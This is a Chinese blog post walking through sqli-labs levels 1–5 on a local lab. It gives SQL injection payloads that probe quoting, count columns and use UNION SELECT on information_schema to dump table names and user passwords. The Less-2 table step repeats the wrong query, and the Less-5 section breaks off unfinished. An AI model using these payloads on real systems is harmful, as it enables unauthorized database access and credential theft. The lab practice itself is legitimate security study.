SQL-LAB闯关Less1-5

最新推荐文章于 2024-07-17 07:12:01 发布
最新推荐文章于 2024-07-17 07:12:01 发布
阅读量165 收藏
点赞数
分类专栏: 网络安全 文章标签: SQL注入 字符型注入 数字型注入 信息泄露 数据库探测
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_29244931/article/details/116940131
版权

less-1 基于错误的单引号字符串

- 正常访问
http://127.0.0.1/sqli-labs/Less-1/?id=1

1. 判断是否存在注入,注入是字符型还是数字型
- 添加 ' 
	返回报错信息:You have an error in your SQL syntax; check the manual that corresponds to your     MySQL  server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
- 添加 ' --+
	不报错
	
2. 猜解SQL查询语句中的字段数
- 使用 1' order by 3 --+
	得到列数为3

3. 确定显示的字段顺序
- 使用union 获取admin和password
	-1 的作用是查询不存在的值,使得结果为空
	-1 ' union select 1,2,3 --+   // 确定可以显示到页面的位置

4. 获取当前数据库
	-1 ' union select 1,2,group_concat(schema_name) from information_schema.schemata --+ // 得到数据库名 或 通过database() 获取数据库名

5. 获取数据库中的表
	-1 ' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security'  --+

6. 获取表中的字段名
	-1 ' union select 1,2,group_concat(column_name) from information_schema.columns where table_name = 'users' --+

7. 获取用户数据
	-1 ' union select 1,2,group_concat(username,"  ",password) from users --+

Less-2 基于错误的get整型注入

- 正常访问 
	http://127.0.0.1/sqli-labs/Less-2/?id=1
	
1. 判断是否存在注入,注入是字符型还是数字型
	- http://127.0.0.1/sqli-labs/Less-2/?id=1'  报错
	- http://127.0.0.1/sqli-labs/Less-2/?id=1 and 1=1 不报错
	- http://127.0.0.1/sqli-labs/Less-2/?id=1 and 1=2 无返回结果
	数字型注入
	
2. 猜解SQL查询语句中的字段数
	http://127.0.0.1/sqli-labs/Less-2/?id=1%20order by 3  页面正常
	http://127.0.0.1/sqli-labs/Less-2/?id=1%20order by 4  页面报错
	列数为3

3. 确定显示的字段顺序
	http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,3
	显示的是2,3列
4. 获取当前数据库
	http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata// 得到数据库名 或 通过database() 获取数据库名

5. 获取数据库中的表
	http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata

6. 获取表中的字段名
	http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name = 'users'

7. 获取用户数据
	http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(username,"  ",password) from users

Less-3 基于错误的get单引号变形字符型注入

- 正常访问
	http://127.0.0.1/sqli-labs/Less-3/?id=1

- 绕过
	id=1') --+
	
- 获取数据
	-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database() --+
	-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name = 'users' --+
	-1') union select 1,2,group_concat(username," ",password) from users --+

Less-4 基于错误的GET双引号字符型注入

- 正常访问
	http://127.0.0.1/sqli-labs/Less-4/?id=1

- 绕过
	id=2") or 1=1 --+
- 获取数据
	-1") union select 1,2,database()  --+
	-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema= database()  --+
	-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name= 'users'  --+
	-1") union select 1,2,group_concat(username," ",password) from users  --+

Less-5 双注入GET单引号字符型注入

- 正常访问
	http://127.0.0.1/sqli-labs/Less-5/?id=1

- 绕过
	id=2") or 1=1 --+
- 获取数据
地势莹唯吾独尊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jupyterlab-sql:JupyterLabSQL GUI
01-30
jupyterlab-sql jupyterlab-sql向JupyterLab添加了一个SQL用户界面: 通过点击界面浏览表 使用自定义查询读取和修改数据库 安装 在JupyterLab 1.x上安装 要安装jupyterlab-sql ,请运行以下命令: pip install ...
SQL-labs/less1通关教程
02-29
参考了部分大佬的作品 原作链接:https://blog.csdn.net/qq_50808416/article/details/130623497
sqli-lab 闯关教程 Less-3
羽路星尘的博客
10-29 247
每天一个注入小实验,过程仅供参考,如有建议或指正欢迎留言,对本文风格的建议也可以留在评论区哟。
sql-lab闯关
godfather914的博客
07-01 256
sql-lab闯关
sql-labs闯关1-10
ljlrookiebird的博客
04-11 534
原理跟第一关相同,单引号报错但是后面加注释又没办法使语句闭合,猜了半天是需要单引号和右括号才能使语句闭合,后台语句为select * from xxx where id=( '1' ) ,我们注入后的语句为:select * from xxx where id = (‘-1’)union select 1,2,database() --+ ')id=1' and if((length(database())>8),sleep(10),0) --+,页面十秒后加载。
sql-labs闯关26~31
qq_44663230的博客
09-03 2340
sql-labs闯关26-28a 29~31暂时不做
lab5-sql
02-18
在本实验"lab5-sql"中,我们将深入探讨TSQL(Transact-SQL),它是SQL的一个重要变种,主要用于Microsoft SQL Server。TSQL不仅包含了标准的SQL语法,还增加了一些特有的扩展功能,使得数据库管理和数据操作更为强大...
第三节 Sqli-lab环境搭建-01
09-15
Sqli-lab环境搭建-01 在本节中,我们将讨论如何搭建Sqli-lab环境,包括安装PhpStudy环境、火狐浏览器插件、Sqlmap和Sqli-Lab等工具。这些工具将帮助我们学习SQL注入漏洞检测和利用。 PhpStudy环境安装 PhpStudy是...
SQL-lab:sql注入全部解析
04-17
SQL-labsql注入全部解析1. 先看题,要求输入一个数字入乡随俗,试一试很显然,会有回显接下来自由发挥,再输入一个2试试,又变了接下来,接下来试一试他的闭合方式添加完单引号,根据报错的回显,发现他是单引号闭合...
PostgreSQL 中如何解决因大量并发删除和插入操作导致的索引抖动?
最新发布
技术笔记
07-17 648
索引抖动是 PostgreSQL 中一个常见的问题,它会对数据库的性能产生严重的影响。通过采用批量操作、分区表、索引优化和调整数据库参数等方法,我们可以有效地解决索引抖动问题,提高数据库的性能和稳定性。在实际应用中,我们应该根据具体情况选择合适的解决方案,并不断地进行优化和调整,以满足业务的需求。解决索引抖动问题就像是一场战斗,我们需要根据敌人(问题)的特点和弱点,选择合适的武器(解决方案),并灵活运用战术(优化方法),才能取得最终的胜利。
国产精品ORM框架-SqlSugar详解 SqlSugar初识 附案例源码 云草桑 专题一
cao919的专栏Net
07-13 764
国产精品ORM框架-SqlSugar详解 1、SqlSugar初识 2、开始实操 3、增删改操作 4、进阶功能 5优美的表达式、仓储、UnitOfWork、DbContext、AOP `代码先行,先有代码,然后有数据库,只关注业务,业务中的对象如果需要就直接创建实体,对应的数。简单易用、功能齐全、高性能、轻量级、服务齐全、官网教程文档、有专业技术支持一天18小时。支持 完整的SAAS一套应用 跨库查询 、租户分库 、租户分表 和 租户数据隔离。数据库的结构完全由代码来决定,数据库表--主键、自增,字段类型。
MySQL 进阶(三)【SQL 优化】
梦想是动物管理员
07-13 1249
MySQL SQL 优化
NoSql选择题解
2301_79659699的博客
07-16 482
5. (单选题, 3分)MongoDB是一种NoSQL数据库,具体地说,是( )存储数据库。13. (单选题, 3分)CAP理论是NoSQL理论的基础,下列性质不属于CAP的是( )。7. (单选题, 3分)CAP理论是NoSQL理论的基础,下列性质不属于CAP的是( )。11. (单选题, 3分)下列关于NoSQL数据库和关系型数据库的比较,不正确的是( )。8. (单选题, 3分)于NoSQL数据库和关系数据库,下列说法不正确的是( )。6. (单选题, 3分)NoSQL数据库是指( )数据存储系统。
PostgreSQL 中如何解决因大量并发插入导致的主键冲突?
技术笔记
07-16 950
在 PostgreSQL 中,解决因大量并发插入导致的主键冲突问题是一个重要的任务。我们可以通过使用唯一索引、序列、批量插入与事务处理、分区表和优化业务逻辑等方法来避免主键冲突的发生。这些方法各有优缺点,我们需要根据实际情况选择合适的解决方案。🎉相关推荐🍅关注博主🎗️带你畅游技术世界,不错过每一次成长机会!📚领书:PostgreSQL 入门到精通.pdf📙PostgreSQL 中文手册📘PostgreSQL 技术专栏🍅CSDN社区-墨松科技。
怎样在 PostgreSQL 中优化对大表的并发读取操作?
技术笔记
07-15 900
在 PostgreSQL 中,大表通常是指包含大量数据的表。这些表可能有数百万、数千万甚至数十亿条记录。当我们处理这样的大表时,查询操作可能会变得非常缓慢,特别是在并发读取的情况下。并发读取操作是指多个进程或线程同时从数据库中读取数据的操作。在实际应用中,并发读取操作是非常常见的,例如多个用户同时查询一个报表或者多个系统同时获取数据进行分析。优化 PostgreSQL 中对大表的并发读取操作是一个综合性的任务,需要我们从多个方面入手。
sql server 练习题5
m0_67688142的博客
07-13 1115
VALUES (101, '2024-05-01 14:30:00', '2024-05-01 15:45:00', 250.99), -- 处理时长1小时15分钟。(102, '2024-05-02 09:00:00', '2024-05-02 10:00:00', 120.50), -- 处理时长1小时。我们想要查询每位员工的工龄(以年为单位)。-- 两周前的分享活动。VALUES (101, 'Login', DATEADD(DAY, -3, GETDATE())), -- 三天前的登录活动。
SQL Server的视图
weixin_49668551的博客
07-16 920
SQL 视图(Views)是一种虚拟表,是基于 SQL 查询结果生成的。这些虚拟表可以包含来自一个或多个表的数据,并且可以像表一样查询;视图是一个表中的数据经过某种筛选后的显示方式,或者多个表中的数据经过连接筛选后的显示方式。使用视图可以简化复杂查询,提高查询的可读性和可维护性,并提供数据的不同视图。视图由一个预定义的查询(SELECT语句)组成,可以像基本表一样用于SELECT语句中;
PostgreSQL 中如何解决因频繁的小事务导致的性能下降?
技术笔记
07-13 1045
这样可以减少事务的数量,降低系统的开销。例如,在一个电商系统中,如果每次用户添加一个商品到购物车都被设计为一个单独的事务,而不是在一定时间内批量处理,那么就会产生大量的小事务。对于一些非关键的、对实时性要求不高的操作,可以将其放入异步任务队列中,在后台进行处理,避免阻塞主事务的执行。以上只是一些常见的解决方法,实际情况可能更加复杂,需要综合考虑应用程序的架构、业务需求和数据库的特点来制定最适合的解决方案。比如,发送订单确认邮件这样的操作,就可以在事务完成后,将任务放入异步队列,由专门的工作进程在后台处理。
sql-lab第42关
07-28
抱歉,我没有找到关于sql-lab第42关的引用内容。可能这个关卡的信息不在提供的引用中。如果你有其他问题,我会尽力回答。 #### 引用[.reference_title] - *1* *3* [sql-labs 闯关 21~25](https://blog.csdn.net/qq_44663230/article/details/126386401)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [sql-lab(ALL 1-65)](https://blog.csdn.net/lee_maple/article/details/123363445)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值